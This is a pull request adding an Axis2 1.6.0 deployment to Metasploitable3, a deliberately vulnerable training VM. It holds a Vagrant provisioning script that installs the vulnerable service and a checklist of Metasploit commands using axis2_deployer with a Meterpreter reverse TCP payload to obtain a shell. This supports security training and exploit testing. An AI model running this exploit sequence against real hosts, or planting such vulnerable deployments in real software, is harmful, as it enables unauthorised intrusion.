### PR TITLE
Add Axis2 vulnerability for Metasploitable3

### DIFF
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -88,6 +88,10 @@ Vagrant.configure("2") do |config|
   config.vm.provision :shell, path: "scripts/installs/setup_mysql.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
 
+  # Vulnerability - Axis2
+  config.vm.provision :shell, path: "scripts/installs/setup_axis2.bat"
+  config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
+
   # Configure Firewall to open up vulnerable services
   config.vm.provision :shell, path: "scripts/configs/configure_firewall.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614

--- a/scripts/installs/setup_axis2.bat
+++ b/scripts/installs/setup_axis2.bat
@@ -1,0 +1,4 @@
+powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://archive.apache.org/dist/axis/axis2/java/core/1.6.0/axis2-1.6.0-war.zip', 'C:\Windows\Temp\axis2-1.6.0-war.zip')" <NUL
+cmd /c ""C:\Program Files\7-Zip\7z.exe" x "C:\Windows\Temp\axis2-1.6.0-war.zip" -oC:\axis2"
+copy /Y C:\axis2\axis2.war "%CATALINA_HOME%\webapps"
+rd /s /q C:\axis2


### PR DESCRIPTION
This adds the [Axis2 vulnerability](https://github.com/rapid7/metasploit-framework/pull/6457) for Metasploitable3

Verification

- [ ] ```vagrant destroy && vagrant up``` to build the image
- [ ] Make sure port 8282 is up and running
- [ ] Start msfconsole
- [ ] Do: ```exploit/multi/http/axis2_deployer```
- [ ] ```set RHOST [IP]```
- [ ] ```set RPORT 8282```
- [ ] ```set PAYLOAD java/meterpreter/reverse_tcp```
- [ ] ```set LHOST [IP]```
- [ ] ```run```
- [ ] You should get a session